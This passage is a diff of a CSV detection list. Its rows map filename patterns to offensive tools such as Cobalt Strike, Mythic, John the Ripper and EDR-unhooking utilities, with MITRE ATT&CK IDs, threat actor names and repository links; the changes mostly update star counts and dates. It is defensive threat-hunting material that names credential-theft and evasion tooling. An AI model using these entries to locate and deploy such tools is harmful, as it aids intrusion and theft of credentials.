- T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/orbitaldump.git*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*/oscp.profile*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/osmedeus*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/out:spacerunner.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/outfile:C:\ProgramData\hashes.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/outflank_bofs/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/outflanknl/*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*/output/payloads/*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/output/ratchatPT*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" @@ -4635,9 +4678,9 @@ "*/p292/Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*/p2p-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/package/portscan/*.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" -"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","726","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" -"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/PackMyPayload.git*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/PackMyPayload/*","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","729","123","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" +"*/pacu.git*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/padre/pkg/exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*/paensy.cpp*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*/papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" @@ -4647,61 +4690,63 @@ "*/parrot-on-docker/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrotsec/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*/parsers/nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/pass_gen.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/PassDetective.git*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*/passhash.sl*","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","1","81","15","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/passive_sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/passwd_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/password/mimipenguin/*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/password_brute.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" -"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/patchfinder64.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*/PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/path_traversal.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/path_traversal_win32.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","","" "*/path-mtu.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/payload_scripts*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_scripts/artifact*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" 